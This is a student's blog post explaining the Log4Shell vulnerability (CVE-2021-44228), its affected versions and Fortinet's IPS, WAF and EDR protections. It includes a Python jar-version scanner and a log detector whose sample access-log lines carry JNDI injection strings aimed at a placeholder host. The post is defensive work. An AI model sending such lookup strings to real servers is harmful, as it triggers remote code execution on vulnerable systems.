LOG4SHELL: CRITICAL LOG4J VULNERABILITY CVE-2021-44228 (Effects on FortiGate Firewalls)

FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java-based logging and audit framework from Apache. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability that a remote attacker can leverage to take full control of a vulnerable machine. This vulnerability is also known as Log4Shell and has the CVE assignment CVE-2021-44228. FortiGuard Labs will be monitoring this issue for any further developments.

The flaw is caused by a feature called message lookup substitution. When enabled (which it was, by default, before the bug fix), Log4j would detect strings referencing JNDI resources in configuration sources, log messages, and parameters passed by applications. Because Log4J doesn’t sanitize URLs passed in these strings, an attacker can craft malicious requests to applications that use Log4J containing message substitution strings in fields containing a URL for a malicious server.

In Apache Log4j2 versions 2.14.1 and below, the Java Naming and Directory Interface (JNDI) features do not protect against attacker-controlled LDAP and other JNDI-related endpoints. A remote code execution vulnerability exists where attacker-controlled log messages or log message parameters are able to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Apache Log4J versions 2.0-beta9 to 2.14.1 are affected.

Upgrading to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well; please refer to “Apache Log4j Security Vulnerabilities” in the APPENDIX for details.
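The affected range above (2.0-beta9 through 2.14.1, fixed in 2.15.0) is what a "search for loaded vulnerable versions" hunt, as described later for FortiEDR, actually tests. The following is an added example, not code from the post or from Fortinet: it parses Log4j version strings with their beta tags, compares them against that range, and scans a directory for log4j-core jars, reading the version from the jar manifest (falling back to the filename). The jar it builds for the demo is a constructed sample containing only a manifest.

```python
import re
import zipfile
from pathlib import Path
from tempfile import TemporaryDirectory

_PRE = {"alpha": 0, "beta": 1, "rc": 2}  # pre-release tags sort before a final release (3)

def parse_version(ver):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?", ver.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {ver!r}")
    major, minor, patch, tag, num = m.groups()
    return (int(major), int(minor), int(patch or 0), _PRE[tag] if tag else 3, int(num or 0))

AFFECTED = (parse_version("2.0-beta9"), parse_version("2.14.1"))  # range named in the post

def is_affected(ver):
    """True when ver lies inside 2.0-beta9 .. 2.14.1 (2.15.0 and later fall outside)."""
    return AFFECTED[0] <= parse_version(ver) <= AFFECTED[1]

def jar_version(jar_path):
    """Version from META-INF/MANIFEST.MF Implementation-Version, else from the filename."""
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" in zf.namelist():
            for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
                if line.startswith("Implementation-Version:"):
                    return line.split(":", 1)[1].strip()
    m = re.search(r"log4j-core-(.+)\.jar$", Path(jar_path).name)
    return m.group(1) if m else None

def scan(root):
    """Return {jar path: version} for every affected log4j-core jar under root."""
    hits = {}
    for jar in Path(root).rglob("log4j-core-*.jar"):
        ver = jar_version(jar)
        if ver and is_affected(ver):
            hits[str(jar)] = ver
    return hits

def _write_demo_jar(path, version):
    # Constructed sample: a jar holding only a manifest, which is all the scan above reads.
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")

def demo():
    """Build one affected and one fixed constructed jar, return the versions the scan flags."""
    with TemporaryDirectory() as tmp:
        _write_demo_jar(Path(tmp) / "log4j-core-2.14.1.jar", "2.14.1")
        _write_demo_jar(Path(tmp) / "log4j-core-2.15.0.jar", "2.15.0")
        return sorted(scan(tmp).values())

if __name__ == "__main__":
    print(demo())  # ['2.14.1']
```

Point `scan()` at an application's lib directory to list the jars that still need the 2.15.0 upgrade; jars with no manifest version and a non-standard filename are skipped and should be checked by hand.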

CVSS score: 10 (CRITICAL)

According to Apache: Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital. At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.

Note: according to fortiguard.com, FortiGate firewalls are not affected by Log4Shell.

FortiGuard Labs has IPS coverage in place for this issue (IPS package version 19.215) under the signature:

Apache.Log4j.Error.Log.Remote.Code.Execution

While we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021-44228 exploitation.

Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of a vulnerable log4j library being loaded by an Apache Tomcat server:

For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)

Fortinet has released the IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution (VID 51006) to address this threat. This signature was initially released in IPS package version 19.215. Please note that, since this was an emergency release, the default action for the signature was set to pass; modify the action according to your needs. As of IPS DB version 19.217 the signature is set to drop by default.

FortiADC supports the IPS signature to mitigate log4j (IPS package version 19.215). FortiProxy supports the IPS signature to mitigate log4j (IPS package version 19.215).

Web Application signatures to prevent this vulnerability were first added in database 0.00305 and have been updated in recent releases to add additional coverage.
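The IPS and WAF signatures above match the lookup string the earlier sections describe, a `${jndi:<scheme>://...}` reference carried in a request field that ends up in a log message. The following is an added example, not Fortinet's signature logic or code from the post: a small detector that runs the same idea over web server access logs, URL-decoding each line first because request fields are often recorded encoded. The log lines are constructed samples and the host is an RFC 2606 placeholder.

```python
import re
from urllib.parse import unquote

# Canonical lookup form from the post: ${jndi:<scheme>://<host>/...}; scheme is captured.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)

# Constructed Apache access-log lines (not real traffic); lookup.example is a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:01:07 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Flookup.example%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.7 - - [10/Dec/2021:14:01:09 +0000] "GET /health HTTP/1.1" 200 2 "-" "${JNDI:rmi://lookup.example/x}"
"""

def normalize(line):
    """URL-decode the line so an encoded '${jndi:' is inspected in its decoded form."""
    return unquote(line)

def scan_line(line):
    """Return the JNDI schemes (lower-cased) referenced by lookup strings in one log line."""
    return [m.group(1).lower() for m in JNDI_RE.finditer(normalize(line))]

def scan_log(text):
    """Map 1-based line numbers to detected schemes, for lines that carry a lookup string."""
    hits = {}
    for no, line in enumerate(text.splitlines(), 1):
        schemes = scan_line(line)
        if schemes:
            hits[no] = schemes
    return hits

if __name__ == "__main__":
    for no, schemes in scan_log(SAMPLE_LOG).items():
        print(f"line {no}: JNDI lookup via {', '.join(schemes)}")
```

Feed the output of `scan_log()` into the same review queue as the IPS alerts; a hit in an access log shows the string reached the server, which is a trigger to check whether the application behind it loads an affected Log4j version.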

Using FortiAnalyzer to detect activities related to exploits of Apache Log4j2 vulnerability

I hope this gave you an understanding of the effects on FortiGate firewalls.

Thank you for reading.

Written by Kavindu Viraj, 3rd Year 1st Semester Cyber Security Student, SLIIT
